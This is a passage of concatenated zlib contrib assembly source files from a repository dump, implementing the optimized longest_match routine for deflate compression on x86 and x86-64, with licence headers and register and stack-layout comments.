        cmpl    %ebp, %ecx
        jbe     LeaveNow                /* if (cur_match <= limit) done */
        subl    $0x00010000, %edx       /* --chain_length (high word) */
        js      LeaveNow
LoopEntry:
        movzwl  -1(%esi,%ecx), %eax     /* *(ushf*)(match+best_len-1) */
        cmpl    %ebx, %eax
        jnz     LookupLoop              /* != scan_end: keep walking */
        movl    window(%esp), %eax
        movzwl  (%eax,%ecx), %eax       /* *(ushf*)match */
        cmpl    scanstart(%esp), %eax
        jnz     LookupLoop              /* != scan_start: keep walking */
/* Store the current value of chainlen. */
        movl    %edx, chainlenwmask(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
        movl    window(%esp), %esi
        movl    scan(%esp), %edi
        addl    %ecx, %esi
        movl    scanalign(%esp), %eax
        movl    $(-MAX_MATCH_8), %edx
        lea     MAX_MATCH_8(%edi,%eax), %edi
        lea     MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
 * adjust %edx so that it is offset to the exact byte that mismatched.
 *
 * We already know at this point that the first three bytes of the
 * strings match each other, and they can be safely passed over before
 * starting the compare loop. So what this code does is skip over 0-3
 * bytes, as much as necessary in order to dword-align the %edi
 * pointer. (%esi will still be misaligned three times out of four.)
 *
 * It should be confessed that this loop usually does not represent
 * much of the total running time. Replacing it with a more
 * straightforward "rep cmpsb" would not drastically degrade
 * performance.
 */
LoopCmps:
        movl    (%esi,%edx), %eax
        xorl    (%edi,%edx), %eax       /* nonzero iff dwords differ */
        jnz     LeaveLoopCmps
        movl    4(%esi,%edx), %eax
        xorl    4(%edi,%edx), %eax
        jnz     LeaveLoopCmps4
        addl    $8, %edx
        jnz     LoopCmps
        jmp     LenMaximum              /* all MAX_MATCH_8 bytes equal */
LeaveLoopCmps4:
        addl    $4, %edx
LeaveLoopCmps:
        testl   $0x0000FFFF, %eax       /* mismatch in the low word? */
        jnz     LenLower
        addl    $2, %edx
        shrl    $16, %eax
LenLower:
        subb    $1, %al                 /* CF set iff low byte matched */
        adcl    $0, %edx                /* ...then credit one more byte */
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
        lea     (%edi,%edx), %eax
        movl    scan(%esp), %edi
        subl    %edi, %eax              /* len = matched bytes */
        cmpl    $MAX_MATCH, %eax
        jge     LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
        movl    deflatestate(%esp), %edx
        movl    bestlen(%esp), %ebx
        cmpl    %ebx, %eax
        jg      LongerMatch
        movl    windowbestlen(%esp), %esi
        movl    dsPrev(%edx), %edi
        movl    scanend(%esp), %ebx
        movl    chainlenwmask(%esp), %edx
        jmp     LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch:
        movl    nicematch(%esp), %ebx
        movl    %eax, bestlen(%esp)
        movl    %ecx, dsMatchStart(%edx)
        cmpl    %ebx, %eax
        jge     LeaveNow
        movl    window(%esp), %esi
        addl    %eax, %esi
        movl    %esi, windowbestlen(%esp)
        movzwl  -1(%edi,%eax), %ebx     /* %edi == scan here */
        movl    dsPrev(%edx), %edi
        movl    %ebx, scanend(%esp)
        movl    chainlenwmask(%esp), %edx
        jmp     LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum:
        movl    deflatestate(%esp), %edx
        movl    $MAX_MATCH, bestlen(%esp)
        movl    %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
        movl    deflatestate(%esp), %edx
        movl    bestlen(%esp), %ebx
        movl    dsLookahead(%edx), %eax
        cmpl    %eax, %ebx
        jg      LookaheadRet
        movl    %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
        addl    $LocalVarsSize, %esp
        .cfi_def_cfa_offset 20
        popl    %ebx
        .cfi_def_cfa_offset 16
        popl    %esi
        .cfi_def_cfa_offset 12
        popl    %edi
        .cfi_def_cfa_offset 8
        popl    %ebp
        .cfi_def_cfa_offset 4
        ret                             /* result already in %eax */
.cfi_endproc
/* void match_init(void) — no setup is needed by this implementation, */
/* so the entry point simply returns. */
match_init:
        ret
|
aiekick/Lumo
| 15,839
|
3rdparty/assimp/contrib/zlib/contrib/gcc_gvmat64/gvmat64.S
|
/*
;uInt longest_match_x64(
; deflate_state *s,
; IPos cur_match); // current match
; gvmat64.S -- Asm portion of the optimized longest_match for 32 bits x86_64
; (AMD64 on Athlon 64, Opteron, Phenom
; and Intel EM64T on Pentium 4 with EM64T, Pentium D, Core 2 Duo, Core I5/I7)
; this file is translation from gvmat64.asm to GCC 4.x (for Linux, Mac XCode)
; Copyright (C) 1995-2010 Jean-loup Gailly, Brian Raiter and Gilles Vollant.
;
; File written by Gilles Vollant, by converting to assembly the longest_match
; from Jean-loup Gailly in deflate.c of zLib and infoZip zip.
; and by taking inspiration on asm686 with masm, optimised assembly code
; from Brian Raiter, written 1998
;
; This software is provided 'as-is', without any express or implied
; warranty. In no event will the authors be held liable for any damages
; arising from the use of this software.
;
; Permission is granted to anyone to use this software for any purpose,
; including commercial applications, and to alter it and redistribute it
; freely, subject to the following restrictions:
;
; 1. The origin of this software must not be misrepresented; you must not
; claim that you wrote the original software. If you use this software
; in a product, an acknowledgment in the product documentation would be
; appreciated but is not required.
; 2. Altered source versions must be plainly marked as such, and must not be
; misrepresented as being the original software
; 3. This notice may not be removed or altered from any source distribution.
;
; http://www.zlib.net
; http://www.winimage.com/zLibDll
; http://www.muppetlabs.com/~breadbox/software/assembly.html
;
; to compile this file for zLib, I use option:
; gcc -c -arch x86_64 gvmat64.S
;uInt longest_match(s, cur_match)
; deflate_state *s;
; IPos cur_match; // current match /
;
; with XCode for Mac, I had strange error with some jump on intel syntax
; this is why BEFORE_JMP and AFTER_JMP are used
*/
#define BEFORE_JMP .att_syntax
#define AFTER_JMP .intel_syntax noprefix
#ifndef NO_UNDERLINE
# define match_init _match_init
# define longest_match _longest_match
#endif
.intel_syntax noprefix
.globl match_init, longest_match
.text
//-----------------------------------------------------------------------
// uInt longest_match(deflate_state *s /* rdi */, IPos cur_match /* esi */)
// System V AMD64 entry (see the ABI comment block below); result in eax.
// Walks the hash chain looking for the longest string in the window
// matching the bytes at s->window + s->strstart.
//-----------------------------------------------------------------------
longest_match:
#define LocalVarsSize 96
/*
; register used : rax,rbx,rcx,rdx,rsi,rdi,r8,r9,r10,r11,r12
; free register : r14,r15
; register can be saved : rsp
*/
// NOTE(review): these save slots sit below rsp without adjusting it.
// That is only valid in the SysV red zone (128 bytes, leaf functions);
// confirm before reusing this code on an ABI with no red zone.
#define chainlenwmask (rsp + 8 - LocalVarsSize)
#define nicematch (rsp + 16 - LocalVarsSize)
#define save_rdi (rsp + 24 - LocalVarsSize)
#define save_rsi (rsp + 32 - LocalVarsSize)
#define save_rbx (rsp + 40 - LocalVarsSize)
#define save_rbp (rsp + 48 - LocalVarsSize)
#define save_r12 (rsp + 56 - LocalVarsSize)
#define save_r13 (rsp + 64 - LocalVarsSize)
#define save_r14 (rsp + 72 - LocalVarsSize)
#define save_r15 (rsp + 80 - LocalVarsSize)
/*
; all the +4 offsets are due to the addition of pending_buf_size (in zlib
; in the deflate_state structure since the asm code was first written
; (if you compile with zlib 1.0.4 or older, remove the +4).
; Note : these value are good with a 8 bytes boundary pack structure
*/
#define MAX_MATCH 258
#define MIN_MATCH 3
#define MIN_LOOKAHEAD (MAX_MATCH+MIN_MATCH+1)
/*
;;; Offsets for fields in the deflate_state structure. These numbers
;;; are calculated from the definition of deflate_state, with the
;;; assumption that the compiler will dword-align the fields. (Thus,
;;; changing the definition of deflate_state could easily cause this
;;; program to crash horribly, without so much as a warning at
;;; compile time. Sigh.)
; all the +zlib1222add offsets are due to the addition of fields
; in zlib in the deflate_state structure since the asm code was first written
; (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
; (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
; (if you compile with zlib 1.2.2.2 or later, use "zlib1222add equ 8").
*/
/* you can check the structure offset by running
#include <stdlib.h>
#include <stdio.h>
#include "deflate.h"
void print_depl()
{
deflate_state ds;
deflate_state *s=&ds;
printf("size pointer=%u\n",(int)sizeof(void*));
printf("#define dsWSize %u\n",(int)(((char*)&(s->w_size))-((char*)s)));
printf("#define dsWMask %u\n",(int)(((char*)&(s->w_mask))-((char*)s)));
printf("#define dsWindow %u\n",(int)(((char*)&(s->window))-((char*)s)));
printf("#define dsPrev %u\n",(int)(((char*)&(s->prev))-((char*)s)));
printf("#define dsMatchLen %u\n",(int)(((char*)&(s->match_length))-((char*)s)));
printf("#define dsPrevMatch %u\n",(int)(((char*)&(s->prev_match))-((char*)s)));
printf("#define dsStrStart %u\n",(int)(((char*)&(s->strstart))-((char*)s)));
printf("#define dsMatchStart %u\n",(int)(((char*)&(s->match_start))-((char*)s)));
printf("#define dsLookahead %u\n",(int)(((char*)&(s->lookahead))-((char*)s)));
printf("#define dsPrevLen %u\n",(int)(((char*)&(s->prev_length))-((char*)s)));
printf("#define dsMaxChainLen %u\n",(int)(((char*)&(s->max_chain_length))-((char*)s)));
printf("#define dsGoodMatch %u\n",(int)(((char*)&(s->good_match))-((char*)s)));
printf("#define dsNiceMatch %u\n",(int)(((char*)&(s->nice_match))-((char*)s)));
}
*/
// Hard-coded deflate_state offsets (see print_depl above to re-derive).
#define dsWSize 68
#define dsWMask 76
#define dsWindow 80
#define dsPrev 96
#define dsMatchLen 144
#define dsPrevMatch 148
#define dsStrStart 156
#define dsMatchStart 160
#define dsLookahead 164
#define dsPrevLen 168
#define dsMaxChainLen 172
#define dsGoodMatch 188
#define dsNiceMatch 192
// Named accessors; all assume rcx = deflate_state pointer.
#define window_size [ rcx + dsWSize]
#define WMask [ rcx + dsWMask]
#define window_ad [ rcx + dsWindow]
#define prev_ad [ rcx + dsPrev]
#define strstart [ rcx + dsStrStart]
#define match_start [ rcx + dsMatchStart]
#define Lookahead [ rcx + dsLookahead] //; 0ffffffffh on infozip
#define prev_length [ rcx + dsPrevLen]
#define max_chain_length [ rcx + dsMaxChainLen]
#define good_match [ rcx + dsGoodMatch]
#define nice_match [ rcx + dsNiceMatch]
/*
; windows:
; parameter 1 in rcx(deflate state s), param 2 in rdx (cur match)
; see http://weblogs.asp.net/oldnewthing/archive/2004/01/14/58579.aspx and
; http://msdn.microsoft.com/library/en-us/kmarch/hh/kmarch/64bitAMD_8e951dd2-ee77-4728-8702-55ce4b5dd24a.xml.asp
;
; All registers must be preserved across the call, except for
; rax, rcx, rdx, r8, r9, r10, and r11, which are scratch.
;
; gcc on macosx-linux:
; see http://www.x86-64.org/documentation/abi-0.99.pdf
; param 1 in rdi, param 2 in rsi
; rbx, rsp, rbp, r12 to r15 must be preserved
;;; Save registers that the compiler may be using, and adjust esp to
;;; make room for our stack frame.
;;; Retrieve the function arguments. r8d will hold cur_match
;;; throughout the entire function. edx will hold the pointer to the
;;; deflate_state structure during the function's setup (before
;;; entering the main loop.
; ms: parameter 1 in rcx (deflate_state* s), param 2 in edx -> r8 (cur match)
; mac: param 1 in rdi, param 2 rsi
; this clear high 32 bits of r8, which can be garbage in both r8 and rdx
*/
// Save the SysV callee-saved registers this function touches (rbx, rbp,
// r12-r15); rsi/rdi are caller-saved here, hence no save (see the
// commented-out restores at the end).
mov [save_rbx],rbx
mov [save_rbp],rbp
mov rcx,rdi // rcx = s, so the accessor macros above work
mov r8d,esi // r8d = cur_match (zero-extends into r8)
mov [save_r12],r12
mov [save_r13],r13
mov [save_r14],r14
mov [save_r15],r15
//;;; uInt wmask = s->w_mask;
//;;; unsigned chain_length = s->max_chain_length;
//;;; if (s->prev_length >= s->good_match) {
//;;; chain_length >>= 2;
//;;; }
mov edi, prev_length
mov esi, good_match
mov eax, WMask
mov ebx, max_chain_length
cmp edi, esi
jl LastMatchGood
shr ebx, 2
LastMatchGood:
//;;; chainlen is decremented once beforehand so that the function can
//;;; use the sign flag instead of the zero flag for the exit test.
//;;; It is then shifted into the high word, to make room for the wmask
//;;; value, which it will always accompany.
dec ebx
shl ebx, 16
or ebx, eax
//;;; on zlib only
//;;; if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead;
mov eax, nice_match
mov [chainlenwmask], ebx
mov r10d, Lookahead
cmp r10d, eax
cmovnl r10d, eax // branchless min(nice_match, lookahead)
mov [nicematch],r10d
//;;; register Bytef *scan = s->window + s->strstart;
mov r10, window_ad
mov ebp, strstart
lea r13, [r10 + rbp]
//;;; Determine how many bytes the scan ptr is off from being
//;;; dword-aligned.
mov r9,r13 // r9 = scan (kept for the whole function)
neg r13
and r13,3 // r13 = scanalign
//;;; IPos limit = s->strstart > (IPos)MAX_DIST(s) ?
//;;; s->strstart - (IPos)MAX_DIST(s) : NIL;
mov eax, window_size
sub eax, MIN_LOOKAHEAD
xor edi,edi
sub ebp, eax
mov r11d, prev_length // r11d = best_len
cmovng ebp,edi // ebp = limit, clamped to 0
//;;; int best_len = s->prev_length;
//;;; Store the sum of s->window + best_len in rsi (windowbestlen).
lea rsi,[r10+r11]
//;;; register ush scan_start = *(ushf*)scan;
//;;; register ush scan_end = *(ushf*)(scan+best_len-1);
//;;; Posf *prev = s->prev;
movzx r12d,word ptr [r9]
movzx ebx, word ptr [r9 + r11 - 1]
mov rdi, prev_ad
//;;; Jump into the main loop.
mov edx, [chainlenwmask]
cmp bx,word ptr [rsi + r8 - 1]
jz LookupLoopIsZero
// The chain-walk loop below is replicated three times (LookupLoop1/2/4
// plus the aligned LookupLoop) with rotated entry points; each copy is
// behaviorally identical: advance cur_match via prev[], bail when it
// drops to limit or chain_length (high word of edx) underflows.
LookupLoop1:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
jbe LeaveNow
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry1:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jz LookupLoopIsZero
AFTER_JMP
LookupLoop2:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry2:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jz LookupLoopIsZero
AFTER_JMP
LookupLoop4:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry4:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jnz LookupLoop1
jmp LookupLoopIsZero
AFTER_JMP
/*
;;; do {
;;; match = s->window + cur_match;
;;; if (*(ushf*)(match+best_len-1) != scan_end ||
;;; *(ushf*)match != scan_start) continue;
;;; [...]
;;; } while ((cur_match = prev[cur_match & wmask]) > limit
;;; && --chain_length != 0);
;;;
;;; Here is the inner loop of the function. The function will spend the
;;; majority of its time in this loop, and majority of that time will
;;; be spent in the first ten instructions.
;;;
;;; Within this loop:
;;; ebx = scanend
;;; r8d = curmatch
;;; edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
;;; esi = windowbestlen - i.e., (window + bestlen)
;;; edi = prev
;;; ebp = limit
*/
.balign 16
LookupLoop:
and r8d, edx
movzx r8d, word ptr [rdi + r8*2]
cmp r8d, ebp
BEFORE_JMP
jbe LeaveNow
AFTER_JMP
sub edx, 0x00010000
BEFORE_JMP
js LeaveNow
AFTER_JMP
LoopEntry:
cmp bx,word ptr [rsi + r8 - 1]
BEFORE_JMP
jnz LookupLoop1
AFTER_JMP
LookupLoopIsZero:
cmp r12w, word ptr [r10 + r8] // scan_start vs *(ushf*)match
BEFORE_JMP
jnz LookupLoop1
AFTER_JMP
//;;; Store the current value of chainlen.
mov [chainlenwmask], edx
/*
;;; Point edi to the string under scrutiny, and esi to the string we
;;; are hoping to match it up with. In actuality, esi and edi are
;;; both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and edx is
;;; initialized to -(MAX_MATCH_8 - scanalign).
*/
lea rsi,[r8+r10]
mov rdx, 0xfffffffffffffef8 //; -(MAX_MATCH_8)
lea rsi, [rsi + r13 + 0x0108] //;MAX_MATCH_8]
lea rdi, [r9 + r13 + 0x0108] //;MAX_MATCH_8]
prefetcht1 [rsi+rdx]
prefetcht1 [rdi+rdx]
/*
;;; Test the strings for equality, 8 bytes at a time. At the end,
;;; adjust rdx so that it is offset to the exact byte that mismatched.
;;;
;;; We already know at this point that the first three bytes of the
;;; strings match each other, and they can be safely passed over before
;;; starting the compare loop. So what this code does is skip over 0-3
;;; bytes, as much as necessary in order to dword-align the edi
;;; pointer. (rsi will still be misaligned three times out of four.)
;;;
;;; It should be confessed that this loop usually does not represent
;;; much of the total running time. Replacing it with a more
;;; straightforward "rep cmpsb" would not drastically degrade
;;; performance.
*/
LoopCmps:
mov rax, [rsi + rdx]
xor rax, [rdi + rdx] // nonzero iff the qwords differ
jnz LeaveLoopCmps
mov rax, [rsi + rdx + 8]
xor rax, [rdi + rdx + 8]
jnz LeaveLoopCmps8
mov rax, [rsi + rdx + 8+8]
xor rax, [rdi + rdx + 8+8]
jnz LeaveLoopCmps16
add rdx,8+8+8
BEFORE_JMP
jnz LoopCmps
jmp LenMaximum // compared all MAX_MATCH_8 bytes equal
AFTER_JMP
LeaveLoopCmps16: add rdx,8
LeaveLoopCmps8: add rdx,8
LeaveLoopCmps:
// Narrow down which byte of rax (the xor difference) is nonzero.
test eax, 0x0000FFFF
jnz LenLower
test eax,0xffffffff
jnz LenLower32
add rdx,4
shr rax,32
or ax,ax
BEFORE_JMP
jnz LenLower
AFTER_JMP
LenLower32:
shr eax,16
add rdx,2
LenLower:
sub al, 1 // CF set iff the low byte matched
adc rdx, 0 // ...credit one more matched byte
//;;; Calculate the length of the match. If it is longer than MAX_MATCH,
//;;; then automatically accept it as the best possible match and leave.
lea rax, [rdi + rdx]
sub rax, r9 // eax = match length
cmp eax, MAX_MATCH
BEFORE_JMP
jge LenMaximum
AFTER_JMP
/*
;;; If the length of the match is not longer than the best match we
;;; have so far, then forget it and return to the lookup loop.
;///////////////////////////////////
*/
cmp eax, r11d
jg LongerMatch
lea rsi,[r10+r11] // restore windowbestlen
mov rdi, prev_ad
mov edx, [chainlenwmask]
BEFORE_JMP
jmp LookupLoop
AFTER_JMP
/*
;;; s->match_start = cur_match;
;;; best_len = len;
;;; if (len >= nice_match) break;
;;; scan_end = *(ushf*)(scan+best_len-1);
*/
LongerMatch:
mov r11d, eax
mov match_start, r8d
cmp eax, [nicematch]
BEFORE_JMP
jge LeaveNow
AFTER_JMP
lea rsi,[r10+rax] // windowbestlen for the new best_len
movzx ebx, word ptr [r9 + rax - 1] // refresh scan_end
mov rdi, prev_ad
mov edx, [chainlenwmask]
BEFORE_JMP
jmp LookupLoop
AFTER_JMP
//;;; Accept the current string, with the maximum possible length.
LenMaximum:
mov r11d,MAX_MATCH
mov match_start, r8d
//;;; if ((uInt)best_len <= s->lookahead) return (uInt)best_len;
//;;; return s->lookahead;
LeaveNow:
mov eax, Lookahead
cmp r11d, eax
cmovng eax, r11d // eax = min(best_len, lookahead)
//;;; Restore the stack and return from whence we came.
// mov rsi,[save_rsi]
// mov rdi,[save_rdi]
mov rbx,[save_rbx]
mov rbp,[save_rbp]
mov r12,[save_r12]
mov r13,[save_r13]
mov r14,[save_r14]
mov r15,[save_r15]
ret 0
//; please don't remove this string !
//; Your can freely use gvmat64 in any free or commercial app
//; but it is far better don't remove the string in the binary!
// db 0dh,0ah,"asm686 with masm, optimised assembly code from Brian Raiter, written 1998, converted to amd 64 by Gilles Vollant 2005",0dh,0ah,0
//;;; match_init() has nothing to initialize in this implementation;
//;;; it exists only so callers can link against it.
match_init:
        ret 0
|
aiekick/Lumo
| 12,418
|
3rdparty/assimp/contrib/zlib/contrib/amd64/amd64-match.S
|
/*
* match.S -- optimized version of longest_match()
* based on the similar work by Gilles Vollant, and Brian Raiter, written 1998
*
* This is free software; you can redistribute it and/or modify it
* under the terms of the BSD License. Use by owners of Che Guevarra
* parafernalia is prohibited, where possible, and highly discouraged
* elsewhere.
*/
#ifndef NO_UNDERLINE
# define match_init _match_init
# define longest_match _longest_match
#endif
#define scanend ebx
#define scanendw bx
#define chainlenwmask edx /* high word: current chain len low word: s->wmask */
#define curmatch rsi
#define curmatchd esi
#define windowbestlen r8
#define scanalign r9
#define scanalignd r9d
#define window r10
#define bestlen r11
#define bestlend r11d
#define scanstart r12d
#define scanstartw r12w
#define scan r13
#define nicematch r14d
#define limit r15
#define limitd r15d
#define prev rcx
/*
* The 258 is a "magic number, not a parameter -- changing it
* breaks the hell loose
*/
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define LocalVarsSize (112)
#define _chainlenwmask ( 8-LocalVarsSize)(%rsp)
#define _windowbestlen (16-LocalVarsSize)(%rsp)
#define save_r14 (24-LocalVarsSize)(%rsp)
#define save_rsi (32-LocalVarsSize)(%rsp)
#define save_rbx (40-LocalVarsSize)(%rsp)
#define save_r12 (56-LocalVarsSize)(%rsp)
#define save_r13 (64-LocalVarsSize)(%rsp)
#define save_r15 (80-LocalVarsSize)(%rsp)
.globl match_init, longest_match
/*
 * On AMD64 the first argument of a function (in our case -- the pointer to
 * deflate_state structure) is passed in %rdi, hence our offsets below are
 * all off of that.
 */
/* you can check the structure offset by running
#include <stdlib.h>
#include <stdio.h>
#include "deflate.h"
void print_depl()
{
deflate_state ds;
deflate_state *s=&ds;
printf("size pointer=%u\n",(int)sizeof(void*));
printf("#define dsWSize (%3u)(%%rdi)\n",(int)(((char*)&(s->w_size))-((char*)s)));
printf("#define dsWMask (%3u)(%%rdi)\n",(int)(((char*)&(s->w_mask))-((char*)s)));
printf("#define dsWindow (%3u)(%%rdi)\n",(int)(((char*)&(s->window))-((char*)s)));
printf("#define dsPrev (%3u)(%%rdi)\n",(int)(((char*)&(s->prev))-((char*)s)));
printf("#define dsMatchLen (%3u)(%%rdi)\n",(int)(((char*)&(s->match_length))-((char*)s)));
printf("#define dsPrevMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->prev_match))-((char*)s)));
printf("#define dsStrStart (%3u)(%%rdi)\n",(int)(((char*)&(s->strstart))-((char*)s)));
printf("#define dsMatchStart (%3u)(%%rdi)\n",(int)(((char*)&(s->match_start))-((char*)s)));
printf("#define dsLookahead (%3u)(%%rdi)\n",(int)(((char*)&(s->lookahead))-((char*)s)));
printf("#define dsPrevLen (%3u)(%%rdi)\n",(int)(((char*)&(s->prev_length))-((char*)s)));
printf("#define dsMaxChainLen (%3u)(%%rdi)\n",(int)(((char*)&(s->max_chain_length))-((char*)s)));
printf("#define dsGoodMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->good_match))-((char*)s)));
printf("#define dsNiceMatch (%3u)(%%rdi)\n",(int)(((char*)&(s->nice_match))-((char*)s)));
}
*/
/*
to compile for XCode 3.2 on MacOSX x86_64
- run "gcc -g -c -DXCODE_MAC_X64_STRUCTURE amd64-match.S"
*/
/* Hard-coded deflate_state field offsets -- these must match the zlib
 * build in use; verify with the print_depl() helper shown above. */
#ifndef CURRENT_LINX_XCODE_MAC_X64_STRUCTURE
#define dsWSize ( 68)(%rdi)
#define dsWMask ( 76)(%rdi)
#define dsWindow ( 80)(%rdi)
#define dsPrev ( 96)(%rdi)
#define dsMatchLen (144)(%rdi)
#define dsPrevMatch (148)(%rdi)
#define dsStrStart (156)(%rdi)
#define dsMatchStart (160)(%rdi)
#define dsLookahead (164)(%rdi)
#define dsPrevLen (168)(%rdi)
#define dsMaxChainLen (172)(%rdi)
#define dsGoodMatch (188)(%rdi)
#define dsNiceMatch (192)(%rdi)
#else
/* Alternate layout for the XCode / MacOSX x86_64 build (see note above). */
#ifndef STRUCT_OFFSET
# define STRUCT_OFFSET (0)
#endif
#define dsWSize ( 56 + STRUCT_OFFSET)(%rdi)
#define dsWMask ( 64 + STRUCT_OFFSET)(%rdi)
#define dsWindow ( 72 + STRUCT_OFFSET)(%rdi)
#define dsPrev ( 88 + STRUCT_OFFSET)(%rdi)
#define dsMatchLen (136 + STRUCT_OFFSET)(%rdi)
#define dsPrevMatch (140 + STRUCT_OFFSET)(%rdi)
#define dsStrStart (148 + STRUCT_OFFSET)(%rdi)
#define dsMatchStart (152 + STRUCT_OFFSET)(%rdi)
#define dsLookahead (156 + STRUCT_OFFSET)(%rdi)
#define dsPrevLen (160 + STRUCT_OFFSET)(%rdi)
#define dsMaxChainLen (164 + STRUCT_OFFSET)(%rdi)
#define dsGoodMatch (180 + STRUCT_OFFSET)(%rdi)
#define dsNiceMatch (184 + STRUCT_OFFSET)(%rdi)
#endif
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
/*
 * ABI: SysV AMD64.  In: %rdi = deflate_state*, %rsi = cur_match.
 * Out: %eax = length of best match found (capped by s->lookahead on exit).
 * Leaf function: saved registers and locals live below %rsp (red zone,
 * see the save_* / _chainlenwmask slot defines above).
 */
longest_match:
/*
 * Retrieve the function arguments. %curmatch will hold cur_match
 * throughout the entire function (passed via rsi on amd64).
 * rdi will hold the pointer to the deflate_state (first arg on amd64)
 */
mov %rsi, save_rsi
mov %rbx, save_rbx
mov %r12, save_r12
mov %r13, save_r13
mov %r14, save_r14
mov %r15, save_r15
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
movl dsPrevLen, %eax
movl dsGoodMatch, %ebx
cmpl %ebx, %eax
movl dsWMask, %eax
movl dsMaxChainLen, %chainlenwmask
jl LastMatchGood
shrl $2, %chainlenwmask
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
decl %chainlenwmask
shll $16, %chainlenwmask
orl %eax, %chainlenwmask
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch, %eax
movl dsLookahead, %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, %nicematch
/* register Bytef *scan = s->window + s->strstart; */
mov dsWindow, %window
movl dsStrStart, %limitd
lea (%limit, %window), %scan
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
mov %scan, %scanalign
negl %scanalignd
andl $3, %scanalignd
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize, %eax
subl $MIN_LOOKAHEAD, %eax
xorl %ecx, %ecx
subl %eax, %limitd
cmovng %ecx, %limitd
/* int best_len = s->prev_length; */
movl dsPrevLen, %bestlend
/* Store the sum of s->window + best_len in %windowbestlen locally, and in memory. */
lea (%window, %bestlen), %windowbestlen
mov %windowbestlen, _windowbestlen
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
movzwl (%scan), %scanstart
movzwl -1(%scan, %bestlen), %scanend
mov dsPrev, %prev
/* Jump into the main loop. */
movl %chainlenwmask, _chainlenwmask
jmp LoopEntry
.balign 16
/* do {
 * match = s->window + cur_match;
 * if (*(ushf*)(match+best_len-1) != scan_end ||
 * *(ushf*)match != scan_start) continue;
 * [...]
 * } while ((cur_match = prev[cur_match & wmask]) > limit
 * && --chain_length != 0);
 *
 * Here is the inner loop of the function. The function will spend the
 * majority of its time in this loop, and majority of that time will
 * be spent in the first ten instructions.
 */
LookupLoop:
andl %chainlenwmask, %curmatchd
movzwl (%prev, %curmatch, 2), %curmatchd
cmpl %limitd, %curmatchd
jbe LeaveNow
subl $0x00010000, %chainlenwmask
js LeaveNow
LoopEntry: cmpw -1(%windowbestlen, %curmatch), %scanendw
jne LookupLoop
cmpw %scanstartw, (%window, %curmatch)
jne LookupLoop
/* Store the current value of chainlen. */
movl %chainlenwmask, _chainlenwmask
/* %scan is the string under scrutiny, and %prev points to the string */
/* we are hoping to match it up with. In actuality, %windowbestlen and */
/* %prev are both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and */
/* %rdx is initialized to -(MAX_MATCH_8 - scanalign). */
mov $(-MAX_MATCH_8), %rdx
lea (%curmatch, %window), %windowbestlen
lea MAX_MATCH_8(%windowbestlen, %scanalign), %windowbestlen
lea MAX_MATCH_8(%scan, %scanalign), %prev
/* the prefetching below makes very little difference... */
prefetcht1 (%windowbestlen, %rdx)
prefetcht1 (%prev, %rdx)
/*
 * Test the strings for equality, 8 bytes at a time. At the end,
 * adjust %rdx so that it is offset to the exact byte that mismatched.
 *
 * It should be confessed that this loop usually does not represent
 * much of the total running time. Replacing it with a more
 * straightforward "rep cmpsb" would not drastically degrade
 * performance -- unrolling it, for example, makes no difference.
 */
#undef USE_SSE /* works, but is 6-7% slower, than non-SSE... */
LoopCmps:
#ifdef USE_SSE
/* Preload the SSE registers */
movdqu (%windowbestlen, %rdx), %xmm1
movdqu (%prev, %rdx), %xmm2
pcmpeqb %xmm2, %xmm1
movdqu 16(%windowbestlen, %rdx), %xmm3
